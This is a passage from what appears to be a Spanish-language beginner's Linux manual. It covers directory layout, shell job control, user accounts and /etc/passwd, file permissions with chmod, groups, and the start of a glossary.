  1295.                constantes usados en la escritura de programas en C. Los
  1296.                ficheros que se encuentran en /usr/include/sys son
  1297.                generalmente usados en la programacion de en UNIX a nivel de
  1298.                sistema. Si esta familiarizado con el lenguaje de programacion
  1299.                C, aqui encontrara los ficheros de cabecera como stdio.h, el
  1300.                cual declara funciones como printf().
  1301.  
  1302.   /usr/local
  1303.   /usr/local Es el directorio donde normalmente pondremos nuestras
  1304.              aplicaciones.
  1305.  
  1306.   /usr/src
  1307.   /usr/src Contiene el codigo fuente (programas por compilar) de varios
  1308.            programas de su sistema. El mas importante es /usr/src/linux, el
  1309.            cual contiene el codigo fuente del kernel de Linux.
  1310.  
  1311.   /var
  1312.   /var Contiene directorios que a menudo cambian su tamaño o tienden a
  1313.        crecer. Muchos de estos directorios solian residir en /usr, por
  1314.        ejemplo en /var/adm encontraremos varios ficheros de interes para el
  1315.        administrador del sistema, especificamente históricos del sistema, los
  1316.        cuales recogen errores o problemas con el sistema.
  1317.  
  1318.         #Capitulo V
  1319.  
  1320.         Control de Tareas
  1321.  
  1322.         Tareas y procesos
  1323.  
  1324.         Control de Tareas es una utilidad incluida en muchos shells
  1325.   (incluidas Bash y Tcsh), que permite el control de multitud de comandos o
  1326.   tareas al momento.  Antes de seguir, deberemos hablar un poco sobre los
  1327.   procesos.
  1328.  
  1329.         Cada vez que usted ejecuta un programa, usted lanza lo que se conoce
  1330.   como proceso, que es simplemente el nombre que se le da a un programa
  1331.   cuando se esta ejecutando. El comando ps visualiza la lista de procesos que
  1332.   se estan ejecutando actualmente, por ejemplo:
  1333.  
  1334.   /home/jperez# ps
  1335.  
  1336.   PID TT STAT  TIME COMMAND
  1337.   24  3 S      0:03 (bash)
  1338.   161  3 R      0:00 ps
  1339.  
  1340.         La columna PID representa el identificador de proceso. La ultima
  1341.   columna COMMAND, es el nombre del proceso que se esta ejecutando. Ahora
  1342.   solo estamos viendo los procesos que esta ejecutando jperez. Vemos que hay
  1343.   dos procesos, bash (Que es el shell o interprete de comandos que usa
  1344.   jperez), y el propio comando ps. Como puede observar, bash se ejecuta
  1345.   concurrentemente con el comando ps. Bash ejecuto ps cuando jperez tecleo el
  1346.   comando. Cuando ps termina de ejecutarse (despues de mostrar la tabla de
  1347.   procesos), el control retorna al proceso bash, que muestra el prompt,
  1348.   indicando que esta listo para recibir otro comando. Un proceso que esta
  1349.   corriendo se denomina tarea para el shell. Los terminos proceso y tarea,
  1350.   son sinonimos. Sin embargo, se suele denominar "tarea" a un proceso, cuando
  1351.   es usado en conjuncion con control de tareas, que es un rasgo del shell que
  1352.   permite cambiar entre distintas tareas.
  1353.  
  1354.         Hay muchos mas procesos aparte de estos corriendo en el sistema, para
  1355.   verlos todos, teclearemos el comando "ps -aux".
  1356.  
  1357.         En muchos casos, los usuarios solo ejecutan un trabajo cada vez, que
  1358.   es el ultimo comando que ellos teclearon desde el shell. Sin embargo,
  1359.   usando el control de tareas, usted podra ejecutar diferentes tareas al
  1360.   mismo tiempo, cambiando entre cada uno de ellos conforme lo necesite.
  1361.   Supongamos que esta usando un procesador de textos, y de repente necesita
  1362.   parar y realizar otra tarea, con el control de tareas, usted podria
  1363.   suspender temporalmente el editor, y volver al shell para realizar
  1364.   cualquier otra tarea, y luego regresar al editor como si no lo hubiese
  1365.   dejado nunca. Lo siguiente solo es un ejemplo, hay montones de usos
  1366.   practicos del control de tareas.
  1367.  
  1368.         Primer plano y Segundo plano
  1369.  
  1370.         Un proceso puede estar en Primer plano o en Segundo plano
  1371.   (background). Solo puede haber un proceso en primer plano por vez, el
  1372.   proceso que esta en primer plano, es el que interactua con usted, recibe
  1373.   entradas de teclado, y envia las salidas al monitor. (Salvo, por supuesto,
  1374.   que haya redirigido la entrada o la salida. El proceso en segundo plano, no
  1375.   recibe ninguna señal desde el teclado por lo general, se ejecutan en
  1376.   silencio sin necesidad de interaccion.
  1377.  
  1378.         Algunos programas necesitan mucho tiempo para terminar, y no hacen
  1379.   nada interesante mientras tanto. Compilar programas es una de estas tareas,
  1380.   asi como comprimir un fichero grande. No tiene sentido que se siente y se
  1381.   aburra mientras estos procesos terminan. En estos casos es mejor lanzarlos
  1382.   en segundo plano, para dejar el ordenador en condiciones de ejecutar otro
  1383.   programa.
  1384.  
  1385.         Los procesos pueden ser suspendidos. Un proceso suspendido es aquel
  1386.   que no se esta ejecutando actualmente, sino que esta temporalmente parado.
  1387.   Despues de suspender una tarea, puede indicar a la misma que continue, en
  1388.   primer plano o en segundo, segun necesite. Retomar una tarea suspendida no
  1389.   cambia en nada el estado de la misma la tarea continuara ejecutandose justo
  1390.   donde se dejo.
  1391.  
  1392.         Tenga en cuenta que suspender un trabajo no es lo mismo que
  1393.   interrumpirlo. Cuando usted interrumpe un proceso (generalmente con la
  1394.   pulsación de |ctrl-C|, el proceso muere, y deja de estar en memoria y
  1395.   utilizar recursos del ordenador. Una vez eliminado, el proceso no puede
  1396.   continuar ejecutandose, y deber ser lanzado otra vez para volver a realizar
  1397.   sus tareas. Tambien se puede dar el caso de que algunos programas capturan
  1398.   la interrupcion, de modo que pulsando |ctrl-C| no se para inmediatamente.
  1399.   Esto se hace para permitir al programa realizar operaciones necesarias de
  1400.   limpieza antes de terminar. De hecho, algunos programas simplemente no se
  1401.   dejan matar por ninguna interrupción.
  1402.  
  1403.         Envio a segundo plano y eliminacion procesos
  1404.  
  1405.         Empecemos con un ejemplo sencillo. El comando yes es un comando
  1406.   aparentemente inutil que envia una serie interminable de y-es a la salida
  1407.   estandar. (En realidad es muy util. Si se utiliza una tuberia (o "pipe")
  1408.   para unir la salida de y-es con otro comando que haga preguntas del tipo
  1409.   si/no, la serie de y-es confirmaria todas las preguntas.)
  1410.  
  1411.   /home/jperez# yes
  1412.   y
  1413.   y
  1414.   y
  1415.   y
  1416.   y |ctrl-C|
  1417.  
  1418.         La serie de y-es continuara hasta el infinito, a no ser que usted la
  1419.   elimine, pulsando la tecla de interrupcion. Tambien puede deshacerse de
  1420.   esta serie de y-es redigiriendo la salida estandar de yes hacia /dev/null,
  1421.   que es como una especie de "agujero negro" o papelera para los datos. Todo
  1422.   lo que usted envie alli, desaparecer: /home/jperez# yes > /dev/null. Ahora
  1423.   va mucho mejor, el terminal no se ensucia, pero el prompt de la shell no
  1424.   retorna. Esto es porque yes sigue ejecutandose y enviando esos inutiles
  1425.   y-es a /dev/null.  Para recuperarlo, pulse la tecla de interrupcion.
  1426.  
  1427.         Supongamos ahora que queremos dejar que el comando yes siga
  1428.   ejecutandose, y volver al mismo tiempo a la shell para trabajar en otras
  1429.   cosas. Para ello enviaremos a yes a segundo plano, lo que nos permitir
  1430.   ejecutarlo, pero sin necesidad de interaccion.
  1431.  
  1432.         Una forma de mandar procesos a segundo plano es añadiendo un caracter
  1433.   "&" al final de cada comando.
  1434.  
  1435.   /home/jperez# yes > /dev/null &
  1436.   [1] 164
  1437.  
  1438.         Como podra ver, ha regresado a la shell. ¿Pero que es eso de
  1439.   "[1] 164"?, ¿Se esta ejecutando realmente el comando yes?. "[1]" representa
  1440.   el numero de tarea del proceso yes. La shell asigna un numero a cada tarea
  1441.   que se este ejecutando. Como yes es el unico comando que se esta ejecutando,
  1442.   se le asigna el numero de tarea 1. El numero "164" es el numero de
  1443.   identificacion del proceso, o PID, que es el numero que el sistema le
  1444.   asigna al proceso. Ambos numeros pueden usarse para referirse a la tarea
  1445.   como veremos despues.
  1446.  
  1447.         Ahora usted tiene el proceso yes corriendo en segundo plano, y
  1448.   enviando constantemente la señal y hacia el dispositivo /dev/null. Para
  1449.   chequear el estado del proceso, utilice el comando interno de la shell
  1450.   jobs:
  1451.  
  1452.   /home/jperez# jobs
  1453.   [1]+  Running                   yes >/dev/null  &
  1454.  
  1455.         Tambien puede usar el comando ps, como mostramos antes, para
  1456.   comprobar el estado de la tarea.
  1457.  
  1458.         Para eliminar una tarea, utilice el comando kill. Este comando toma
  1459.   como argumento un numero de tarea o un numero de ID de un proceso. Esta era
  1460.   la tarea 1, asi que usando el comando
  1461.  
  1462.   /home/jperez# kill %1
  1463.  
  1464.         matar la tarea. Cuando se identifica la tarea con el numero de tarea,
  1465.   se debe preceder el numero con el caracter de porcentaje ("%").
  1466.  
  1467.         Ahora que ya hemos matado la tarea, podemos usar el comando jobs de
  1468.   nuevo para comprobarlo:
  1469.  
  1470.   /home/jperez# jobs
  1471.   [1]+  Terminated                yes >/dev/null
  1472.  
  1473.         La tarea esta , en efecto, muerta, y si usa el comando jobs de nuevo,
  1474.   no mostrar nada.
  1475.  
  1476.         Tambien podra matar la tarea usando el numero de ID de proceso (PID),
  1477.   el cual se muestra conjuntamente con el ID de tarea cuando arranca la misma.
  1478.   En nuestro ejemplo el ID de proceso es 164, asi que el comando
  1479.  
  1480.   /home/jperez# kill 164
  1481.  
  1482.         es equivalente a
  1483.  
  1484.   /home/jperez# kill %1
  1485.  
  1486.         No es necesario usar el "%" cuando nos referimos a una tarea a traves
  1487.   de su ID de proceso.
  1488.  
  1489.         Detencion o parada y relanzamiento de tareas
  1490.  
  1491.         Hay otra manera de poner una tarea en segundo plano. Usted puede
  1492.   lanzarlo como un proceso normal (en primer plano), pararlo, y despues
  1493.   relanzarlo en segundo plano.
  1494.  
  1495.         Primero, lance el proceso yes en primer plano como lo haria
  1496.   normalmente:
  1497.  
  1498.   /home/jperez# yes > /dev/null
  1499.  
  1500.         De nuevo, dado que yes corre en primer plano, no debe retornar el
  1501.   prompt de la shell.
  1502.  
  1503.         Ahora, en vez de interrumpir la tarea con |ctrl-C|, suspenderemos la
  1504.   tarea. El suspender una tarea no la mata: solamente la detiene
  1505.   temporalmente hasta que Ud. la retoma. Para hacer esto usted debe pulsar la
  1506.   tecla de suspender, que suele ser |ctrl-Z|.
  1507.  
  1508.   /home/jperez# yes > /dev/null
  1509.  
  1510.   |ctrl-Z|
  1511.   [1]+  Stopped                   yes >/dev/null
  1512.   /home/jperez#
  1513.  
  1514.         Mientras el proceso esta suspendido, simplemente no se esta
  1515.   ejecutando. No gasta tiempo ni recursos del sistema en la tarea. Sin
  1516.   embargo, usted puede retomar el proceso de nuevo como si nada hubiera
  1517.   pasado. Continuara ejecutandose donde se dejo. Para relanzar la tarea en
  1518.   primer plano, use el comando fg (del ingles "foreground").
  1519.  
  1520.   /home/jperez# fg yes >/dev/null
  1521.  
  1522.         La shell muestra el nombre del comando de nuevo, de forma que tenga
  1523.   conocimiento de que tarea es la que ha puesto en primer plano. Pare la
  1524.   tarea de nuevo, con |ctrl-Z|. Esta vez utilice el comando bg para poner la
  1525.   tarea en segundo plano. Esto hara que el comando siga ejecutandose igual
  1526.   que si lo hubiese hecho desde el principio con "&"
  1527.  
  1528.   /home/jperez# bg
  1529.   [1]+ yes >/dev/null &
  1530.   /home/jperez#
  1531.  
  1532.         Y tenemos de nuevo el prompt. El comando jobs deberia decirnos que
  1533.   yes se esta ejecutando, y podemos matar la tarea con kill tal y como lo
  1534.   hicimos antes.
  1535.  
  1536.         Como podemos parar la tarea de nuevo?  Si pulsa |ctrl-Z| no
  1537.   funcionara, ya que el proceso est  en segundo plano. La respuesta es poner
  1538.   el proceso en primer plano de nuevo, con el comando fg, y entonces pararlo.
  1539.   Como puede observar podr  usar fg tanto con tareas detenidas, como con las
  1540.   que esten segundo plano.
  1541.  
  1542.         Hay una gran diferencia entre una tarea que se encuentra en segundo
  1543.   plano, y una que se encuentra detenida. Una tarea detenida es una tarea que
  1544.   no se esta ejecutando, es decir, que no usa tiempo de CPU, y que no esta
  1545.   haciendo ningun trabajo (la tarea aun ocupa un lugar en memoria, aunque
  1546.   puede ser volcada a disco). Una tarea en segundo plano, se esta ejecutando,
  1547.   y usando memoria, a la vez que completando alguna accion mientras usted
  1548.   hace otro trabajo. Sin embargo, una tarea en segundo plano puede intentar
  1549.   mostrar texto en su terminal, lo que puede resultar molesto si esta
  1550.   haciendo hacer otra cosa. Por ejemplo, si usted uso el comando
  1551.  
  1552.   /home/jperez# yes &
  1553.  
  1554.         sin redirigir stdout a /dev/null, una cadena de y-es se mostrar en su
  1555.   monitor, sin que pueda interrumpirlo (no puede hacer uso de |ctrl-C| para
  1556.   interrumpir tareas en segundo plano). Para poder parar esas interminables
  1557.   y-es, tendria que usar el comando fg para pasar la tarea a primer plano, y
  1558.   entonces usar |ctrl-C| para matarla. Otra observacion. Normalmente, los
  1559.   comandos "fg" y "bg" actuan sobre el ultimo proceso parado (indicado por un
  1560.   "+" junto al numero de tarea cuando usa el comando jobs). Si usted tiene
  1561.   varios procesos corriendo a la vez, podria mandar a primer o segundo plano
  1562.   una tarea especifica indicando el ID de tarea como argumento de fg o bg,
  1563.   como en /home/jperez# fg %2 (para la tarea de primer plano numero 2), o
  1564.   /home/jperez# bg %3
  1565.         (Para la tarea de segundo plano numero 3). No se pueden usar los ID
  1566.   de proceso con fg o bg. Ademas de esto, si usa el numero de tarea por si
  1567.   solo, como /home/jperez# %2
  1568.  
  1569.         es equivalente a
  1570.  
  1571.   /home/jperez# fg %2
  1572.  
  1573.         Solo queda recordarle que el uso de control de tareas es una utilidad
  1574.   de la shell. Los comandos fg, bg y jobs son internos de la shell. Si por
  1575.   algun motivo usted utiliza una shell que no soporta control de tareas, no
  1576.   espere disponer de estos comandos. Y ademas, hay algunos aspectos del
  1577.   control de tareas que difieren entre Bash y Tcsh. De hecho, algunas shells
  1578.   no proporcionan ningun control de tareas sin embargo, la mayoria de las
  1579.   shells disponibles para Linux soportan control de tareas.
  1580.  
  1581.         #CAPITULO VI
  1582.  
  1583.         Administracion de Usuarios
  1584.  
  1585.         Este es uno de los temas mas importantes para quien ser el
  1586.   administrador del sistema. Gran parte de la seguridad del sistema depender
  1587.   de la correcta administracion y control de los usuarios, el administrador
  1588.   puede tomar dos posturas incorrectas a la hora de proteger el sistema una
  1589.   seria el exceso de celo en el cuidado lo que muchas veces va a resultar
  1590.   molesto a los usuarios y la otra es ser muy confiado lo que seguro va a
  1591.   traer complicaciones con los usuarios experimentados, la postura que yo
  1592.   recomiendo el una intermedia. Administrar un sistema es algo asi como
  1593.   cuidar la novia o esposa. Independientemente de que tenga muchos usuarios o
  1594.   no en su sistema, es importante comprender los aspectos de la gestion de
  1595.   usuarios bajo Linux. Incluso si se es el unico usuario, se debe tener,
  1596.   presumiblemente, una cuenta distinta de root para hacer la mayor parte del
  1597.   trabajo.
  1598.  
  1599.         Cada persona que utilice el sistema debe tener su propia cuenta. Es
  1600.   una malisima idea el que varias personas compartan la misma cuenta. No solo
  1601.   es un problema de seguridad, sino que las cuentas se utilizan para
  1602.   identificar univocamente a los usuarios del sistema. Se necesita ser capaz
  1603.   de saber quien esta haciendo que en cada momento que queramos.
  1604.  
  1605.         Usuario: podriamos definir como usuario a cada persona que pueda
  1606.   logearse al sistema, el que para ello deber ser validado por el
  1607.   superusuario. A cada usuario le corresponder lo que se llama "Cuenta" una
  1608.   cuenta son lo recursos que se le asignan a ese usuario. A su vez cuando el
  1609.   usuario de loguea, se dice que inicia una sesion.
  1610.  
  1611.         Para la correcta administracion de los usuarios, tendremos que cargar
  1612.   toda la informacion que el sistema necesita a fin de identificar como ya
  1613.   dijimos univocamente a cada uno. La mayoria de esta informacion la
  1614.   encontraremos en el archivo "passwd" que se encuentra en el directorio
  1615.   "/etc" a continuacion hago un detalle de esa informacion.
  1616.  
  1617.   * Nombre de usuario: El nombre de usuario es el identificador unico dado a
  1618.     cada usuario del sistema. Ejemplos de nombres de usuario son juan, jerez
  1619.     y mariag. Se puede utilizar letras y digitos junto a los caracteres "_"
  1620.     (subrayado) y "." (Punto). Los nombres de usuario se limitan normalmente
  1621.     a 8 caracteres de longitud.
  1622.  
  1623.   * User ID: El user ID, o UID, es un numero unico dado a cada usuario del
  1624.     sistema. El sistema normalmente mantiene la pista de la informacion por
  1625.     UID, no por nombre de usuario.
  1626.  
  1627.   * Group ID: El group ID, o GID, es la identificacion del grupo del usuario
  1628.     por defecto. Cada usuario pertenece a uno o mas grupos definidos por el
  1629.     administrador del sistema.
  1630.  
  1631.   * Clave: El sistema tambien almacena la clave encriptada del usuario. El
  1632.     comando passwd se utiliza para poner y cambiar las claves de los usuarios.
  1633.  
  1634.   * Nombre completo: El "nombre real" o "nombre completo" del usuario se
  1635.     almacena junto con el nombre de usuario. Por ejemplo, el usuario jperez
  1636.     se llama "Juan Perez" en la vida real.
  1637.  
  1638.   * Directorio inicial: El directorio inicial es el directorio en el que se
  1639.     coloca inicialmente al usuario en tiempo de conexion. Cada usuario debe
  1640.     tener su propio directorio inicial, normalmente situado bajo /home.
  1641.  
  1642.   * Shell de inicio: El shell de inicio del usuario es el interprete de
  1643.     comandos que es arrancado para el usuario en tiempo de conexion. Ejemplos
  1644.     pueden ser /bin/bash y /bin/tcsh.
  1645.  
  1646.         Como ya dije el fichero /etc/passwd contiene la informacion anterior
  1647.   acerca de los usuarios. Cada linea del fichero contiene informacion acerca
  1648.   de un unico usuario; el formato de cada linea es:
  1649.  
  1650.   nombre:clave encriptada:UID:GID:nombre completo:dir.inicio:shell
  1651.  
  1652.         Un ejemplo puede ser:
  1653.  
  1654.   jperez:Xv8Q981g71oKK:102:100:Juan Perez:/home/jperez:/bin/bash
  1655.  
  1656.         Como puede verse, el primer campo , "jperez", es el nombre de usuario.
  1657.  
  1658.         El siguiente campo, "Xv8Q981g71oKK", es la clave encriptada. Las
  1659.   claves no se almacenan en el sistema en ningun formato legible por el
  1660.   hombre. Las claves se encriptan utilizandose a si mismas como clave secreta.
  1661.   En otras palabras, solo si se conoce la clave, esta puede ser desencriptada.
  1662.   Esta forma de encriptacion es bastante segura.
  1663.  
  1664.         Algunos sistemas utilizan "claves en sombra" en la que la informacion
  1665.   de las claves se relega al fichero /etc/shadow. Puesto que /etc/passwd es
  1666.   legible por todo el mundo, /etc/shadow suministra un grado extra de
  1667.   seguridad, puesto que este no lo es. Las claves en sombra suministran
  1668.   algunas otras funciones como puede ser la expiracion de claves;
  1669.  
  1670.         El tercer campo "102", es el UID. Este debe ser unico para cada
  1671.   usuario.
  1672.  
  1673.         El cuarto campo, "100", es el GID. Este usuario pertenece al grupo
  1674.   numerado 100. La informacion de grupos, como la informacion de usuarios, se
  1675.   almacena en el fichero /etc/group. El quinto campo es el nombre completo
  1676.   del usuario. "Juan Perez".
  1677.  
  1678.         Los dos ultimos campos son el directorio inicial del usuario
  1679.   (/home/kiwi) y el shell (/bin/bash), respectivamente. No es necesario que el
  1680.   directorio inicial de un usuario tenga el mismo nombre que el del nombre de
  1681.   usuario. Sin embargo, ayuda a identificar el directorio.
  1682.  
  1683.         Como agregar un usuario
  1684.  
  1685.         Cuando se añade un usuario hay varios pasos a seguir. Primero, se le
  1686.   debe crear una entrada en /etc/passwd, con un nombre de usuario y UID
  1687.   unicos. Se debe especificar el GID, nombre completo y resto de informacion.
  1688.   Se debe crear el directorio inicial, y poner los permisos en el directorio
  1689.   para que el usuario sea el dueño. Se deben suministrar ficheros de comandos
  1690.   de inicializacion en el nuevo directorio y se debe hacer alguna otra
  1691.   configuracion del sistema (por ejemplo, preparar un buzon para el correo
  1692.   electronico entrante para el nuevo usuario). Aunque todo esto puede ser
  1693.   hecho a mano es mucho mas sencillo y seguro usar un programa que se provee
  1694.   con Linux llamado "adduser" este programita nos ira preguntando uno a uno
  1695.   los datos necesarios y una vez completados se encargara de modificar todos
  1696.   los archivos necesarios de configuracion y crear los directorios necesarios.
  1697.  
  1698.         Como borrar un usuario.
  1699.  
  1700.         Para borrar un usuario nos basta con borrarlo del archivo "passwd" y
  1701.   eliminar tambien todos sus archivos y directorios. Esto se puede hacer a
  1702.   mano o usar deluser que es mas seguro. Tambien podemos deshabilitar al
  1703.   usuario colocando un asterisco en el lugar donde va la clave encriptada.
  1704.  
  1705.         Aqui es importante saber que el superusuario puede cambiar en
  1706.   cualquier momento la clave de cualquier usuario, mientras que cada usuario
  1707.   solo puede cambiar su clave si el root se lo permite. Asi tambien se puede
  1708.   habilitar a los usuarios para que cambien por ejemplo su shell y puedan
  1709.   elegir el que mas les guste.
  1710.  
  1711.         #Capitulo VII
  1712.  
  1713.         Permisos de Ficheros
  1714.  
  1715.         Conceptos de permisos de ficheros
  1716.  
  1717.         Al ser UNIX un sistema multiusuario, para proteger los archivos
  1718.   importantes del sistema tales como el archivo de claves o ficheros de
  1719.   usuarios particulares de la manipulacion por parte de otros, UNIX
  1720.   proporciona un mecanismo conocido como permisos de ficheros. Este mecanismo
  1721.   permite que ficheros y directorios "pertenezcan" a un usuario en particular.
  1722.   Por ejemplo, como jperez creo ficheros en su directorio "home", jperez es
  1723.   el propietario de esos ficheros y tiene acceso a ellos.
  1724.  
  1725.         UNIX tambien permite que los ficheros sean compartidos entre usuarios
  1726.   y grupos de usuarios. Si jperez lo desea, podria restringir el acceso a sus
  1727.   ficheros de forma que ningun otro usuario tenga acceso excepto el root por
  1728.   supuesto. De cualquier modo, en la mayoria de los sistemas por defecto se
  1729.   permite que otros usuarios puedan leer tus ficheros pero no modificarlos o
  1730.   borrarlos.
  1731.  
  1732.         Como hemos explicado arriba, cada fichero pertenece a un usuario en
  1733.   particular. Por otra parte, los ficheros tambien pertenecen a un grupo en
  1734.   particular, que es un conjunto de usuarios definido por el sistema. Cada
  1735.   usuario pertenece al menos a un grupo cuando es creado. El administrador
  1736.   del sistema puede hacer que un usuario tenga acceso a mas de un grupo.
  1737.  
  1738.         Los grupos usualmente son definidos por el tipo de usuarios que
  1739.   acceden a la maquina. Por ejemplo, en un sistema UNIX de una universidad,
  1740.   los usuarios pueden ser divididos en los grupos estudiantes, direccion,
  1741.   profesores e invitados. Hay tambien unos pocos grupos definidos por el
  1742.   sistema (como bin y admin) los cuales son usados por el propio sistema para
  1743.   controlar el acceso a los recursos muy raramente los usuarios normales
  1744.   pertenecen a estos grupos.
  1745.  
  1746.         Los permisos estan divididos en tres tipos: lectura, escritura y
  1747.   ejecucion. Estos permisos pueden ser fijados para tres clases de usuarios:
  1748.   el propietario del fichero, el grupo al que pertenece el fichero y para
  1749.   todos los usuarios independientemente del grupo.
  1750.  
  1751.         El permiso de lectura permite a un usuario leer el contenido del
  1752.   fichero o en el caso de un directorio, listar el contenido del mismo
  1753.   (usando ls). El permiso de escritura permite a un usuario escribir y
  1754.   modificar el fichero. Para directorios, el permiso de escritura permite
  1755.   crear nuevos ficheros o borrar ficheros ya existentes en dicho directorio.
  1756.   Por ultimo, el permiso de ejecucion permite a un usuario ejecutar el
  1757.   fichero si es un programa o script del shell. Para directorios, el permiso
  1758.   de ejecucion permite al usuario cambiar al directorio en cuestion con cd.
  1759.  
  1760.         Interpretando los permisos de ficheros
  1761.  
  1762.         Veamos un ejemplo del uso de premisos de ficheros.  Usando el
  1763.   comando ls con la opción -l se mostrara un listado "largo" de los ficheros,
  1764.   el cual incluye los permisos de ficheros.
  1765.  
  1766.   -rwxr-xr-x     1 jperez       users      505 Mar 13 19:05        archivo
  1767.  
  1768.         Este fichero pertenece a jperez y al grupo users. Echemos un vistazo
  1769.   a los permisos. La cadena -rw-r--r-- nos informa, por orden, los tres
  1770.   primero corresponden al propietario, los que le siguen al grupo y los
  1771.   ultimos a todos. El primer caracter de la cadena de permisos ("-")
  1772.   representa el tipo. El "-" significa que es un archivo. Las siguientes tres
  1773.   letras ("rwx") representan los permisos para el propietario del fichero,
  1774.   jperez. El "r" para "lectura" y "w" para escritura y "x" para ejecucion.
  1775.   Los tres caracteres siguientes representan lo permisos del grupo, aqui
  1776.   vemos que este archivo tiene permisos de lectura y ejecucion del grupo.
  1777.   Y finalmente los ultimos tres caracteres representan los permisos para
  1778.   todos los usuarios, tambien de lectura e ejecucion.
  1779.  
  1780.         Dependencias
  1781.  
  1782.         Es importante darse cuenta de que los permisos de un fichero tambien
  1783.   dependen de los permisos del directorio en el que residen. Por ejemplo,
  1784.   aunque un fichero tenga los permisos -rwxrwxrwx, otros usuarios no podran
  1785.   acceder a el a menos que tambien tengan permiso de lectura y ejecucion para
  1786.   el directorio en el cual se encuentra el fichero. Si jperez quiere
  1787.   restringir el acceso a todos sus ficheros, podria simplemente poner los
  1788.   permisos de su directorio "home" /home/jperez a -rwx------. De esta forma
  1789.   ningun usuario podra acceder a su directorio ni a ninguno de sus ficheros o
  1790.   subdirectorios. Jperez no necesita preocuparse de los permisos individuales
  1791.   de cada uno de sus ficheros.
  1792.  
  1793.         En otras palabras, para acceder a un fichero, debes de tener permiso
  1794.   de ejecucion de todos los directorios a lo largo del camino de acceso al
  1795.   fichero, ademas de permiso de lectura (o ejecucion) del fichero en
  1796.   particular.
  1797.  
  1798.         Habitualmente, los usuarios de un sistema UNIX son muy abiertos con
  1799.   sus ficheros. Los permisos que se dan a los ficheros usualmente son
  1800.   -rw-r--r--, lo que permite a todos los dem s usuarios leer los ficheros,
  1801.   pero no modificarlos de ninguna forma. Los directorios, usualmente tienen
  1802.   los permisos -rwxr-xr-x, lo que permite que los demas usuarios puedan
  1803.   moverse y ver los directorios, pero sin poder crear o borrar nuevos
  1804.   ficheros en ellos.
  1805.  
  1806.         Muchos usuarios pueden querer limitar el acceso de otros usuarios a
  1807.   sus ficheros. Poniendo los permisos de un fichero a -rw------- no se
  1808.   permitir a ningun otro usuario acceder al fichero. Igualmente, poniendo los
  1809.   permisos del directorio a -rwx------ no se permitir  a los demas usuarios
  1810.   acceder al directorio en cuestion.
  1811.  
  1812.         Cambiando permisos
  1813.  
  1814.         El comando "chmod" se usa para establecer los permisos de un fichero.
  1815.   Solo el propietario puede cambiar los permisos del fichero. La sintaxis de
  1816.   chmod es: chmod {a,u,g,o}{+,-}{r,w,x} <archivo>
  1817.  
  1818.         Brevemente, indicamos a que usuarios afecta all, user, group o other.
  1819.   Entonces se especifica si se estan añadiendo permisos (+) o quit ndolos
  1820.   (-). Finalmente se especifica que tipo de permiso read, write o execute.
  1821.   Algunos ejemplos:
  1822.  
  1823.   chmod a+r archivo
  1824.  
  1825.         Da a todos los usuarios acceso al fichero.
  1826.  
  1827.   chmod +r archivo
  1828.  
  1829.         Como arriba si no se indica "a", "u", "g" u "o" por defecto se toma a.
  1830.  
  1831.   chmod og-x archivo
  1832.  
  1833.         Quita permisos de ejecucion a todos los usuarios excepto al
  1834.   propietario.
  1835.  
  1836.   chmod u+rwx archivo
  1837.  
  1838.         Permite al propietario leer, escribir y ejecutar el fichero.
  1839.  
  1840.   chmod o-rwx archivo
  1841.  
  1842.         Quita permisos de lectura, escritura y ejecucion a todos los usuarios
  1843.   menos al propietario y a los usuarios del grupo del fichero.
  1844.  
  1845.         Los usuarios mas experimentados pueden usar directamente la
  1846.   nomenclatura octal para asignar o quitar permisos.
  1847.  
  1848.         Grupos
  1849.  
  1850.         Como hemos citado anteriormente, cada usuario pertenece a uno o mas
  1851.   grupos. La unica importancia real de las relaciones de grupo es la
  1852.   perteneciente a los permisos de ficheros, como dijimos en la seccion 3.9,
  1853.   cada fichero tiene un "grupo propietario" y un conjunto de permisos de
  1854.   grupo que define de que forma pueden acceder al fichero los usuarios del
  1855.   grupo.
  1856.  
  1857.         Hay varios grupos definidos en el sistema, como pueden ser bin, mail,
  1858.   y sys.  Los usuarios no deben pertenecer a ninguno de estos grupos; se
  1859.   utilizan para permisos de ficheros del sistema. En su lugar, los usuarios
  1860.   deben pertenecer a un grupo individual, como users. Si se quiere ser
  1861.   detallista, se pueden mantener varios grupos de usuarios como por ejemplo
  1862.   estudiantes, directivos, profesores, soporte y facultad.
  1863.  
  1864.         El fichero /etc/group contiene informacion acerca de los grupos. El
  1865.   formato de cada linea es
  1866.  
  1867.         nombre de grupo:clave:GID:otros miembros
  1868.  
  1869.   Algunos ejemplos de grupos pueden ser:
  1870.  
  1871.   root:*:0:
  1872.   usuarios:*:100:jperez, lmamani
  1873.   invitados:*:200:
  1874.   otros:*:250:alumno
  1875.  
  1876.         El primer grupo, root, es un grupo especial del sistema reservado
  1877.   para la cuenta root. El siguiente grupo, users, es para usuarios normales.
  1878.   Tiene un GID de 100.  Los usuarios jperez y lmamani tienen acceso a este
  1879.   grupo. Recuerdese que en /etc/passwd cada usuario tiene un GID por defecto.
  1880.   Sin embargo, los usuarios pueden pertenecer a mas de un grupo, añadiendo
  1881.   sus nombres de usuario a otras lineas de grupo en /etc/group. El comando
  1882.   groups lista a que grupos se tiene acceso.
  1883.  
  1884.         El tercer grupo, invitados, es para usuarios invitados, y otros es
  1885.   para "otros" usuarios.  El usuario alumno tiene acceso a este grupo.
  1886.  
  1887.         Como se puede ver, el campo "clave" de /etc/group raramente se
  1888.   utiliza. A veces se utiliza para dar una clave para acceder a un grupo.
  1889.   Esto es raras veces necesario. Para evitar el que los usuarios cambien a
  1890.   grupos privilegiados (con el comando newgroup), se pone el campo de la
  1891.   clave a "*".
  1892.  
  1893.         Se pueden usar los comandos addgroup o groupadd para añadir grupos a
  1894.   su sistema. Normalmente es mas sencillo añadir lineas a /etc/group uno
  1895.   mismo, puesto que no se necesitan mas configuraciones para añadir un grupo.
  1896.   Para borrar un grupo, solo hay que borrar su entrada de /etc/group.
  1897.  
  1898.         #Glosario
  1899.  
  1900.   * Bugs: Errores en la confeccion de un programa.
  1901.  
  1902.   * Driver: programa encargado de servir de intermediario entre el sistema
  1903.             operativo y los distintos dispositivos conectados en el ordenador.
  1904.  
  1905.   * FAQ: Frecuent  Asked  Question. Cuestion frecuentemente preguntada.
  1906.          Recopilacion de preguntas y respuestas sobre las dudas mas
  1907.          frecuentes.
  1908.  
  1909.   * FTP: File Transfer Protocol: Protocolo utilizado para la transmision de
  1910.          ficheros.
  1911.  
  1912.   * GNU: GNU 's not UNIX. Frase recursiva que representa al proyecto
  1913.          encargado de la proteccion y creacion de software de libre
  1914.          distribucion.
  1915.  
